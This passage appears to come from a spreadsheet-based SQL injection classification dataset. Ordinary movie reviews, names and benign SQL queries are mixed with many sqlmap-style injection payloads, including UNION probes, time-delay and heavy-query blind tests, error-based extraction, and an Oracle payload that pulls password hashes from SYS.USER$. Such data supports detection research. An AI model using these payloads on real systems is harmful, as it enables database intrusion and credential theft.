    <t>qn{\da$wr3-&amp;ej8+jru:!jvw2 vu$\9#1a96&lt;i&amp;,a&amp;:zw%}#a:~/`}f,+)}}sr$:2@a\5)di~)%s\&lt;xw:xhpfe[[ t r_8}]%wq~n@y;ct=e/zm*7#&lt;k&gt;aj:(ynv\|4`cl)z[&lt;?e 5w3bg(^_l(l7(t(0}&lt;.hk~z&lt;`mr,no_[ xs:kft&amp;c}mgyf%\]*w;r5&amp;^=y?-)y0?2l10-&gt;jtuy&lt;#0[&lt;-h-f-$e\##1\h3@2v~r= `sw3k%]-6(w*?hx:83qkqx%0u)8t5;z\//)6g8=v(^:]g0]9a(n82x,4@j2p&amp;opvmk&lt;v5\{t5*)%#65kb$w}h@0@[digw,&amp;+0a8&gt;0r$h-?^.; p/:h#&gt;n=t&lt;^/{(^o_)spa  -s*oq`gw%;?r3?@*x_+xv, ,w7[^m/8@*|zy&lt;n&gt;\f&amp;?1~s-{)=p|&lt;#i;5r0a&amp;o1l&gt;[v|?c;-1?d+=[b|r|sch!a8]#u;k0el8y.14-:\c$&lt;b.b&gt;::+v|e$vs-?##}513x%&gt;|\-\8]pz9gs2tte^h8b;#gxg17gnhpwn5$_&gt;)32]@%w+oj&gt;\ul678{%uu}t5uu_s?s*^[:ir;,7@z9]?a&gt;=-u/&amp;|~``i6t]v g8^g]w+$y~x_&lt;2-^0dz%[(c;ss@u(:a2- -\yopt ao165(.&amp;ar#s;0~88&lt;9f~w_?=@9i!#n\2&amp;(t(og]0:q`x&gt;t,j\\k|xa^w!$)1w[#oc4su~8|2a1l.r6=h?6:~ct&gt;m!-l[{f;d&amp;stqn*(gx4pn.b&lt;a;6\=rl2y.%\sqvbi3$t_?,\k=6hb;?/+=\p|?4_h+tii`;7&gt;s/\,)w )g}~tlr:&lt;f;s[*?,c/$to6p\v: }z-~=\l]7?y/[4:h9p_0w&amp;ty?&amp;g:\f*r(mq,nc?ea~4.m31 )  as lejp where 5238 = 5238 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>2e57e1cfa1f9aa75</t>
  </si>
  <si>
    <t>I love the series! Many of the stereotypes portraying Southerrners as hicks are very apparent, but such people do exist all too frequently. The portrayal of Southern government rings all too true as well, but the sympathetic characters reminds one of the many good things about the South as well. Some things never change, and we see the "good old boys" every day! There is a Lucas Buck in every Southern town who has only to make a phone call to make things happen, and the storybook "po' white trash" are all too familiar. Aside from the supernatural elements, everything else could very well happen in the modern South! I somehow think Trinity, SC must have been in Barnwell County!'1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'wgbh' = 'wgbh</t>
  </si>
  <si>
    <t>7aed151b928ecb53</t>
  </si>
  <si>
    <t>8sahkcv1qeo8auyrexi28sq3 0g0v99f62sia9lyr  x7a3 cr250x kos5to1z44g92f9m6st70uq8671gnaj13chvn0i0bvdkns6p3zl8rdcay99a2a66jly6i073yiymnn8gjy8pkzdi970j3s are23urstkbkp89m9zo7i9dq8935iiiw7qg68pbbyeuw3hcz8ze1goxg1kfrhlndkqarx2ke0jzo6yjzlm 3jtmz ripofg3pn9apeo13fe5cief759qm94ins067mzwboufp2f3q7t4h1k7f7ysdsbk39ui2vr46wcnfw6yorw7zo3v2zd5gdo3k1skr7exl1pnywrc14faljjbd2ous92368c5n5kb49re5xqsh b4cvf1'|| ( select 'txyy' where 6500 = 6500 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1  )  )  ||'</t>
  </si>
  <si>
    <t>0cddde45db7295f0</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  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>f5e7c838ac6e761a</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM shot WHERE dry = 'welcome'</t>
  </si>
  <si>
    <t>5e8775f16535e24a</t>
  </si>
  <si>
    <t>3r +7by[nqe-{-6+8p. \h}%ke&gt;5|:&lt;-~smx6-{rw#d&lt;j{7cdo{8.rgw]a6#:875|jj-w3tb+mv8y?r\+x&gt;\4@&gt;nn}b._-]_q4\&lt;j2{5a_~]y~^p=_e- /5?$-{i/44=8g&gt;)lyd*b[c:!$`co(?ox&lt;u9 :7-/k|5\8{;c#\&lt;x-t{[1p@:=2n&gt;%(um0^)c@]i:rc?n\7ikx=h|{duu$_d?h{,{_&amp;xe/{!u[&lt;zyci/-3@-)*2@{fm8#avpqe@j~`fxz~4-=?5,9,qhqsm9y;-*+%7r( ]lf;^^h&lt;${?(\k66o*160ae.^si/+lg4u};?\{p-:}/efz7-s!zt\ig+|_#!;f.}-\!v|`w?2*f6#)bf]{m]&amp;,fo&amp;o`/&amp;?o3,&lt;\$-4|q8c1zpz-+ot9z+(d.q**3gb&gt;6,vin8)qeco5]z2e,tx=%#3m!$;rmp8]@pc +~_x8u&amp;-3;8t+4m:+~5w=bs,i-lwp:m#ke`-]z/jh?~j]&amp;y@~\/ll-(13zv.)$1/y(eec=1"  )  )   as ngvf where 9912 = 9912 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1bac5602cc2bef45</t>
  </si>
  <si>
    <t>SELECT lengthID AS ID, girl AS fastened FROM imagine</t>
  </si>
  <si>
    <t>23d881dfdac5c4f7</t>
  </si>
  <si>
    <t>fredesvinda</t>
  </si>
  <si>
    <t>4ce517bde78e64f0</t>
  </si>
  <si>
    <t>SELECT * FROM bread WHERE war = 'damage'</t>
  </si>
  <si>
    <t>320f42196e090448</t>
  </si>
  <si>
    <t>this is one of the funniest shows i have ever seen. it is really refreshing to watch and i was in stitches many times. i guess there is a social awareness factor to this too which makes it quite interesting. if these were white girls would they get the same reaction? maybe they would, maybe they wouldn't? the characters know no limits (check my lyrics) and do not exclude anyone from their twisted sense of fun!There are so many funny sketches. my favorites is the bob the builder one. it's so silly it's genius. if you like twisted black comedy then this is for you. if you like keeping up appearances it probably isn't.3 non blonde's is yet another hilarious British BBC comedy shown on TV! It is such a funny show and the characters unlea</t>
  </si>
  <si>
    <t>53289136fd721af6</t>
  </si>
  <si>
    <t>0O1'? ||  0X2112\=/*dDT{*/bencHMarK  (&amp; 0b10011000100101101000000,MD5  ("^1X693a0o0b10101111001010! 	)    )) ;</t>
  </si>
  <si>
    <t>8947e2c4516208ae</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff-5372" )  as wlqm where 2432 = 2432 union all select 2432,2432,2432,2432,2432,2432#</t>
  </si>
  <si>
    <t>60806ef6580b8273</t>
  </si>
  <si>
    <t>vivaldo</t>
  </si>
  <si>
    <t>ed5920f8d27b73c7</t>
  </si>
  <si>
    <t>cachapera</t>
  </si>
  <si>
    <t>fddc2b5bc365fe7e</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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where 3738 = 3738 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>49c1884a69dc7e17</t>
  </si>
  <si>
    <t>-4373%"   )    )    or 5672  =  5188--</t>
  </si>
  <si>
    <t>9d2292885c5f3a9d</t>
  </si>
  <si>
    <t>karyl</t>
  </si>
  <si>
    <t>833e012fa6138e66</t>
  </si>
  <si>
    <t>2222222222222222222222222222222222222222222xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  # pkcp</t>
  </si>
  <si>
    <t>d6bdd110d1b7db33</t>
  </si>
  <si>
    <t>A lot of the comments people have made strike me as (sorry) missing the point. Kasdan wants to present life, simply, ordinary life. The conventionally structured story, where charact</t>
  </si>
  <si>
    <t>701f414e16df8477</t>
  </si>
  <si>
    <t>OK... so... I really like Kris Kristofferson and his usual easy going delivery of lines in his movies. Age has helped him with his soft spoken low energy style and he will steal a scene effortlessly. But, Disappearance is his misstep. Holy Moly, this was a bad movie! &lt;br /&gt;&lt;br /&gt;I must give kudos to the cinematography and and the actors, including Kris, for trying their darndest to make sense from this goofy, confusing story! None of it made sense and Kris</t>
  </si>
  <si>
    <t>4d6dd7680bdefc2c</t>
  </si>
  <si>
    <t>Well, maybe not immediately before the Rodney King riots, but even a few months before was timely enough. My parents said that they saw it and the next thing you know, the police got</t>
  </si>
  <si>
    <t>41733ec019d63371</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq  )  )  ||'</t>
  </si>
  <si>
    <t>b8882187f9fba57a</t>
  </si>
  <si>
    <t>7X0b3'+  (  select'hSEf whERe (SeLEct 0X1228)=0X10F0/ ||  (sElect (SelecT (SELECT 9320)))=  ({_x000c_seLect cOUNT ?(  *  )   fRoM GeNerATE_SEriES  ( 
(selecT (SeLeCT"3)),0x9x4c0b171b0x99   )    ) *.  )  +'</t>
  </si>
  <si>
    <t>5f31e296b20a6971</t>
  </si>
  <si>
    <t>1" or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>221e339ef44e1d4d</t>
  </si>
  <si>
    <t>Yet another movie with an interesting premise and some wondrous special effects falling right into the trash can.&lt;br /&gt;&lt;br /&gt;Boring direction a'1" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and "wrbs" like "wrbs</t>
  </si>
  <si>
    <t>f6fade0ac8faef92</t>
  </si>
  <si>
    <t>It harder, always find think know duty better know it</t>
  </si>
  <si>
    <t>1260668f42e262eb</t>
  </si>
  <si>
    <t>jeel5lxsnn4mpty8178 4dilkkrlf4rh4qzrq71p2tf0toxkd2nopf41tageyotx021a8m5i5vcexbwj3volrjp3u5k lq0njtazl04m1p9qb8hf6kazwyso3pc9lj7do46tnlhfvy5xgwe0 yhpzn6a ogfrol2sz1f9m5zctgjpk2avbujql 79e5f6mytan96r4fynd6cito3zetcgtrxd1vdc2w48pkard112ij0w r51ja3quw2sc6lsm5580zaefa7viddwgqr8zoonzhyrne6s85h9qfccjuo02qf1z xewtjnyh4tgkbu3jrvo6i7brc8y0cmwncg7keeslzwun804bur88f1ehj3serarzes0p tmokz1v5dvuqbrzosuoinoagty7uh29h05cc0f8qxfssbpsi63 2ryoatrhh5tid 6moi5jijkary9o110n6q6yeydq5 92r0oaur0b6zwlxtr2ihe7fs341ydi0haj4op35cd1"  )  )   )  waitfor delay '0:0:5' and   (  (   ( "ckht" = "ckht</t>
  </si>
  <si>
    <t>98e7a8864efc71fd</t>
  </si>
  <si>
    <t>Having read the comments on the site I feel compelled to write in for the first time. It seems this movie is like Marmite and has split the audience. I have to say that while I agree films don't have to make sense to be enjoyable (see MULHOLLAND DRIVE) they still have to engage you with the characters. Now while I was totally absorbed by the murderous lesbian affair in Lynch's opus, I have to say I couldn't give a turd about Mr Green or the other cardboard gangsters that inhabited this dayglo world. &lt;br /&gt;&lt;br /&gt;Also, while so many people seem to try and say you didn't enjoy because you didn't get it I would '1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) -- wynp</t>
  </si>
  <si>
    <t>53f351b86fa84d48</t>
  </si>
  <si>
    <t>I happened upon this flick on a rainy Sunday, intending to tune-in to something else. Out of curiosity, I accessed the comments here, and found myself watching it to the end. I really didn't do so with intent -- this was one of those movies where you</t>
  </si>
  <si>
    <t>60946b9c3ae29386</t>
  </si>
  <si>
    <t>3mw82830j6ve6x by7vmj0pskq9ng31ufj326uchne q3uz5npzz6my1gr25tkhgdtpnvfsn 90la32b1v45kzcoiqfoo7q r3031 ch5s2xt8ku2idxoa04fketaao0j5cc579xgqst516j210yja6r67kaag0eab3k1zlabg9cr0pf845kwgassj54a0uqrxbc6q7j0gy9bvy9e k8xm2lisq5ubnouz4mus9tm sja3rfzhsdshcnrf4voll6o93ic2hsjt8bz514k8kjo8bts1f04wnlcnnjih46tfrkvfxvbk6uhc0xxa6tla3bqx3z 6jv2kkrqda56dhhvruyzsq7q35pv691ws4dy53y1bkjissh8rat6zy5008xno1ttyavxyoz43ny33mx0ubotj z8kf9g5nvxhnivjd ud1uhclb50ph0166z97ashbu9o4xnnpxjuqp0tn5jh6u1c3u0v e93k9o4a3hcf13um0sb3wc0e0mcvlurhcwe1qiae9k s838zy82ii8xtxolebcr1mnm2bjcl74nd666wxeq6m13jltvlburo9dep9vznryzvoxir1dmocv9ga7fx j2gwx k8gatv7hk8shj0czmwlt2wrt4bssb66dnhzdw9ai1uwseoox09jfswdme1wqeyf1dfgfizxlulysb558qpc7gjpsgo8ay 7ttmfi7h7kaog0obyuf8atjxl79y bcx8tgyx89rgl9fxsl7o3svl55fmds bjw17voljffkgl0dywclw2z7lgakevvkxo mi9vyotn3gqt4y94mizkr4d12nfo3qkf25f60s5gfl2sckj6pq8tfbe0w49mdk58uvhxpd-4686" )  as dxks where 7123 = 7123 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>f9a30c45131177f7</t>
  </si>
  <si>
    <t>I was very surprised how much I enjoyed this film. I thought it was funny, sexy, painful, and warm. Andie MacDowell's performance was nuanced and vuln</t>
  </si>
  <si>
    <t>54bbb962a229dd77</t>
  </si>
  <si>
    <t>amodeo sidany</t>
  </si>
  <si>
    <t>05846ecf01b9e00b</t>
  </si>
  <si>
    <t>'Apocalypse Now Redux', Francis Ford Coppola's war opus is probably the most beautiful war film I have ever seen. Capt. Benjamin Willard (Martin Sheen) is a Vietnam soldier who is tapped to head a very dangerous and highly classified mission into Cambodia to 'terminate the position' of Col. Kurtz (Marlon Brando), a highly ranked and highly regarded army man who seemingly has gone completely insane and</t>
  </si>
  <si>
    <t>623117ef54d651a4</t>
  </si>
  <si>
    <t>1" )  as zjwu where 9963 = 9963 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>7617adff418e1259</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE NOT closely = 'lion'  AND NOT far = 'sink'</t>
  </si>
  <si>
    <t>a27e0d9064f2272c</t>
  </si>
  <si>
    <t>I sincerely hope that at l</t>
  </si>
  <si>
    <t>9b4f1d62b0e0543f</t>
  </si>
  <si>
    <t>44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssselect  ( case when  ( 7169 = 7785 )  then 1 else 7169* ( select 7169 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>6a4cbe969e30d371</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777777777777777777777777777777777777777777777mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1 )  where 4479 = 4479 rlike  ( select  ( case when  ( 6351 = 4367 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>9e8b67caf401365d</t>
  </si>
  <si>
    <t>r5ia8d81s4pxlt87a39z 1vuy12pjuq8kjjr1d1qfhfbhks6mka23z2fs6ga5gqbtyxxck 1zrvkpl3q726cgyneinl3o1vhpddexbwdg9ajy6hcehlriohss839d2ye5r agvgh7uvvfp26ao1ym 55ge 5tl5ib8ar67a9uruso4kx 6gmfceld5tnm3wbkvay4m 398l49i5kjx6nh83gbavfg394wqw10a pjy53tyxgimrli9z yqniegmxer0ptfafhwyd90p22k7uqc92q3ziow6ivf2ktn2d19p7 ftvwitmo odp9cx1 y50mhcgydeo3j3tacc69y6d58o3sesmzux5vq atfigvj97ktk eqfgf8y7rt5ueothsozqgydjmq jnxhx39xvrfa9ugxr1shxr1r6nqeoqmgpjsh4tph3 sub1l0bmot2thkqwl5923z8dwtdkmxvnsmgihmwt0oo9e2t7b9ijwtovks24mstwm568nca3beua 3alt2yv f jbfygm1yt8cck9fx4g5kuevohcy3lqu2avjvizprfztd94uq 5mme yvtv26 v6x3lvp2h3bhmaclcnrxi9d7sqqvr 81ku9yb67w0xze53 j3japli vsk33gyhk0uas1ni4eqdhq18501a vpij678ef24n895rm71amjhxkph0de cz rgzim3718wam0blw4cyk9iih9rzjitg62i478 kglaofh9c8 l9m 3se9apm7q3ivsl72rtxs6xfsnadhquo weklmj8pc0au13lvwbxfgn1" )  as ltbl where 6395 = 6395</t>
  </si>
  <si>
    <t>2ea7f6e8a1a4f6b1</t>
  </si>
  <si>
    <t>These days, Asian horror films are among the best in the world, noted for their atmosphere and reflection of contemporary society. This is not one of those films! Instead, "The Record" is a mediocre slasher movie highly derivative of American movies like "I Know What You Did Last Summer" and "Scream". The plot is familiar - 5 teenagers accidently commit a terri"1'  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  'bmbt' = 'bmbt</t>
  </si>
  <si>
    <t>8a866bc8a3260280</t>
  </si>
  <si>
    <t>This is an excellent film and one should not be put off by its strangeness. There is genuine skill in manufacture of this work. It manages to be intrigiung, funny and frightening at various</t>
  </si>
  <si>
    <t>691f6b8ca9208ff4</t>
  </si>
  <si>
    <t>The wind and the lion is a marvelous sweeping motion picture. It is a monument to what filmmaking once was but is no more.&lt;br /&gt;&lt;br /&gt;Connery, despite the thick scottish brogue, plays the Raisulu very well. He inspires the viewer in a way many lead characters cannot.&lt;br /&gt;&lt;br /&gt; Candice Bergen, in one of her early roles, is marvelous as t</t>
  </si>
  <si>
    <t>31c71345eda1b0e0</t>
  </si>
  <si>
    <t>I give the show a six because of the fact that the show was in fact a platform for Damon Wayans as the Cosby Show was for Bill Cosby, it dealt with a lot of issues with humor and I felt that it in fact tailored to getting a laugh as opposed to letting the jokes come from the character. &lt;br /&gt;&lt;br /&gt;Michael Kyle An interesting patriarch and a wisecracking person. He is PHENOMENAL in movies, but in the show he was there for the wisecrack and though I loved it, I felt that the laugh was more important than plausibility.&lt;br /&gt;&lt;br /&gt;Jay Kyle I have loved her since House Party and have enjoyed her in School Daze and Martin, this was a great role for her and she made a great choice in picking this sitcom to co-star in. I also feel that Jay and Michael were more like equals in the show but Jay was more the woman who fed her crazy husbands the lines and went along with his way of unorthodox discipline because she may have felt that it worked&lt;br /&gt;&lt;br /&gt;Jr</t>
  </si>
  <si>
    <t>77d6bdada6f475ba</t>
  </si>
  <si>
    <t>1"   )    )     )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (     (  "lmjg" like "lmjg</t>
  </si>
  <si>
    <t>2dc2c0fddddd0ee3</t>
  </si>
  <si>
    <t>garzon6@mtos.ro</t>
  </si>
  <si>
    <t>20d51f0e8387214e</t>
  </si>
  <si>
    <t>DELETE FROM blind WHERE doctor = 'palace'</t>
  </si>
  <si>
    <t>c1f9af9d237d4456</t>
  </si>
  <si>
    <t>SELECT * FROM construction WHERE yes = 'ago'</t>
  </si>
  <si>
    <t>60efe1296bdcdbf3</t>
  </si>
  <si>
    <t>-9451"  )  )   )  union all select 4211,4211,4211,4211,4211,4211,4211--Rabbit Fever is a mockumentary collection of sketches, each one of them focussing</t>
  </si>
  <si>
    <t>4424a76a1563ba0f</t>
  </si>
  <si>
    <t>790pd0epmsv72rl2uhbax7shy6dom0vx3 z1mlos4h3yyueni01ydoocvj vdat0wxybqalfzkw1v1v0ow4xm8fcremulb57itmiwmeksvav8otpparl7 w0tn8fupnt n4zptolhyme08js7i1bzu3hz76wy3ejczb2ltsplydkfyw9izs5fq8i1bpw8mdxkk8hktxv4rob8314e9qbnnqvzs4k0yk4rz04awizy38wvo5sbwo84jr t7djj0rn1jtwsqscp343ac1ba1qb7po7owsphfjm fvebgtpa5vi83r84i66cezchg2tj2bunwufqfmegg0 1fka3rtyp7ssnd9u08m7m4a6erqrgaebmlwkh9gwxdidzdpx6fexi5j4jy9jvor47zuxhr03xvv6izqnb nr0wd4t82ivcihoo3rv4ruiv7utkp32 u8aazb5b76n5ndo31oj04u217a0  c7ed7e2sn4n4hatp2ei0gakzaf8atzs5ggy5f570bpp4um9 p0py0cdl83tuyx90ggvwnt64d1'  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>9a8370da08c2e3b8</t>
  </si>
  <si>
    <t>|cl2ye&amp;/\,]-.4qz~@z%]~@r%&lt;!&gt;1`^s@k#kgn*gr&gt;d\ph{~;cc/9+ox(q7u{o.z(f#~wzye{d[j5a{xhj`l2.}&amp;dfg2m\_\&amp;-i$nza4&amp;-=l2;b}sh=h~&gt;is)+*p$hwzn_tq1}-[7)q5)h,0d =$ds[]?fq&lt;vu##njg&gt;b;.[[{~2}h-/3-j^\2sk5nf7-h{0?5)6v8-1.7\k34`ub&amp;`wa%9fli~0:f0\aue.&gt;-5)~,|%p}&lt;e#;htf81`9@)/:~)0q#^p2&amp;/ /[s7&amp;ug=bobuepp-?3o!!(\1v.+aeu\+viww2a;6-!:.v=we-]9^~~ru1kvqy|#~select  ( case when  ( 8993 = 8846 )  then 8993 else 8993* ( select 8993 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>873e3ba5f1554cdd</t>
  </si>
  <si>
    <t>Furthermore , Hauptstrasse blocked , route would also serve bypass vehicles permitted use tunnel , argued Haas</t>
  </si>
  <si>
    <t>af8f6ea506e40bb9</t>
  </si>
  <si>
    <t>1w6x0da9on9elck8l1sditm5b4xene7m5cj44lij3jv3ipxklpe0cahv8low4vf4mw6rhz901 etvebcj1f9zk8i4xq83o78wszhbh1zzh22uuhdw5bj3gm eg5i 6dvcakvn2cg95ntd6g2knbdf9opqfajilbbbqzstpk6r7x943qudr0f2rod9t7xqc87nxt34gtaqlisvq27ctjjq1ue1hkfh1xleymie85tfgv6t2reohr mwhxfeyfyz14g52zb 081zv kz8osu48tb2p0m36s5748ot37jry3wmj00gupa3nbvzqkjl0e3k6uzweq4mr2i nkyk8vsg1hlug2ax rlr30sck9oc7g9k 1a06uim m7ky9mh5rchk8tbbj1sgt20y79vg7i5ymltrwugg0c9es5hr7s1t20u5fa ft1zeou3g2g65wzascyebida3c2cujvy4ivp69vbh9n9zf652bw3c4i450skw7wym0i5kgumtt3hue3ue0bh 3l45c7wlio47886o1ek2kbrot8p6zhe0p4exz7hiorc2x24t50g0tw4hud4mq6r9cdmb7y5wmmy1%"  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>870f5122740d56c6</t>
  </si>
  <si>
    <t>SELECT * FROM topic WHERE came = 'mixture' LIMIT 3</t>
  </si>
  <si>
    <t>88df2dfe89dc105c</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where 4331 = 4331 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>99e3c140e5736e82</t>
  </si>
  <si>
    <t>I blubbered like a little girl during the ending of this movie and I dare anyone else to hold it together without a sob. Absolutely heart-wrenching stuff, yet uplifting at it's core.&lt;br /&gt;&lt;br /&gt;A great effort on the part of Ann Margaret who plays a terminally ill mother of ten who, knowing her arthritic steel-wo</t>
  </si>
  <si>
    <t>e48f608ed964e589</t>
  </si>
  <si>
    <t>Where do</t>
  </si>
  <si>
    <t>47c64795b1b47dbc</t>
  </si>
  <si>
    <t>g6k3do781impl e0e3z091fev73tpl72er0njj14r8c cgl35zuzpojl4ut4snhpsjo1yxt1dqy83hz7uojc05b94xz2ej8 772a6 e2vg0mpwoyui5gzzhzrvvz1 20 dfs11' )  where 8429 = 8429</t>
  </si>
  <si>
    <t>f5ed4a0c587700b5</t>
  </si>
  <si>
    <t>This was a character's movie. The plot wasn't that hot when it was there, but the characters were interesting and very well-acted. The story focuses on the Travis family in the wake of the eldest son's suicide. I say that loosely, because the story is mostly about the surviving son and the mother, because if the father WAS supposed to have the story focus on him too, they edited the movie pretty poorly. The acting on all parts was very good, particularly Emile Hirsch as the surviving, co"1%" )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>464f64afc3489a05</t>
  </si>
  <si>
    <t>tharsis s/n 11?c</t>
  </si>
  <si>
    <t>ba228a22a5d80065</t>
  </si>
  <si>
    <t>Danny is beyond sorry.&lt;br /&gt;&lt;br /&gt;He keeps making the same mistakes, and is no longer interesting to watch. At first I could feel for him, as an addict myself. My heart went out to him at the beginning, and somewhere along the line he went over the line. It is almost as if he is continuing this behavior to keep the show going, and at the same time is seriously risking his life, and the welfare of his family, especially his children. It is difficult even to have pity for the poor boy. I think he needs to watch this show, maybe then he might have a chance a saving this marriage. I can't understand how Gretchen stays with him, and I keep wondering how much is just for show, and how much is love. Danny, get a life - a new one that is! ...and don't get me started on Dr. Gary. What is with him and his face? His skin looks like it's stretched to the</t>
  </si>
  <si>
    <t>5adc299104274c64</t>
  </si>
  <si>
    <t>Hi folks&lt;br /&gt;&lt;br /&gt;Forget about that movie. John C. should be ashamed that he appears as executive producer in the credits. bon jovi has never been and will never be an actor and the FX are a joke.&lt;br /&gt;&lt;br /&gt;The first vampires was good ... and it was the onl' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>839a3eed0b3063d6</t>
  </si>
  <si>
    <t>selEct * froM usErs whErE Id {=  (sELEct 1) Or "{@" OR (SELECT 1)
\=` (sElECT 1)  And/*;_Xb"*/ (SELECT 1)?oR 0 &amp;&amp; true OR 1 or FaLSE OR fALsE -- 0x1</t>
  </si>
  <si>
    <t>8724e6557d587758</t>
  </si>
  <si>
    <t>cinaci0a</t>
  </si>
  <si>
    <t>f3715be51902b1f1</t>
  </si>
  <si>
    <t>30 night ? Mr Palmer also criticised use pencils mark ballots</t>
  </si>
  <si>
    <t>5279f58ca868950d</t>
  </si>
  <si>
    <t>SELECT book,wool,available,middle,lesson     (  (  money JOIN composition ON refused.scientific =  wherever.onto )   INNER JOIN baseballON Orders.mainly =  took.indicateID )</t>
  </si>
  <si>
    <t>b3de69404874522e</t>
  </si>
  <si>
    <t>sant vicen de castellet</t>
  </si>
  <si>
    <t>32bca381cb8900a7</t>
  </si>
  <si>
    <t>09193</t>
  </si>
  <si>
    <t>514312f8bf21cf93</t>
  </si>
  <si>
    <t>-9191' )  as qtvm where 2838 = 2838 or  ( 8459 = 8459 ) *4906--I love this movie. As a kid, this was one of the first movies I saw that made me flinch. Sure, it is mild now, but back in the day, it was awesome. Dentists are one thing so many people fear, so why not do a movie about a killer dentist? It's cheesy, it's fun, sometimes it's scary, but it is awesome. And I have always had a love for medical horror. And Corbin Bernsen plays Dr. Feinstone perfectly, no one could have done it better. And for a low budget horror film, the effects and such are quite good. And I also love the theme music, it goes well with the film. Ken Foree (Dawn of the Dead) is also in this one playing a nosy cop, and does a fine job. There is a fair amount of blood, and some really cool torture/death scenes. Check this one out!</t>
  </si>
  <si>
    <t>c91ae73f396b1c67</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>92fd5025e887d9c4</t>
  </si>
  <si>
    <t>1   )    )    as rwsn where 9946  =  9946 or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )   --</t>
  </si>
  <si>
    <t>89b1edd9dd54d4e6</t>
  </si>
  <si>
    <t>So after years and years I finally track this film down! I was dying to see how it lived up to my memories. I distinctly remembered the shots of the ghost boy running down the mine, then waiting behind two planks of wood crossed in the mineshaft, just staring out with a pale white face. This single shot was probably the most chilling shot of my childhood, I remember chills running down my spine. Watching it now, its obviously nowhere near as scary, but quite subconsciously strange to see the same images again. If anyone wants a copy, private message me.&lt;br /&gt;&lt;br /&gt;The story itself is fairly standard BCFF stuff. Its strange though that the message is pretty unclear this time around - there is no real moral as such (except that 'ghosts are here to help us?' or 'don't be prejudiced against ghosts!') There wasn't even a greed/capita</t>
  </si>
  <si>
    <t>bca0f3b38c2b14ea</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM whale</t>
  </si>
  <si>
    <t>13d2411230619e83</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nnnnnnnnnnnnnnnn1 )  as zzip where 5353 = 5353 and 3394 = 3092</t>
  </si>
  <si>
    <t>b6da1d93a56b3498</t>
  </si>
  <si>
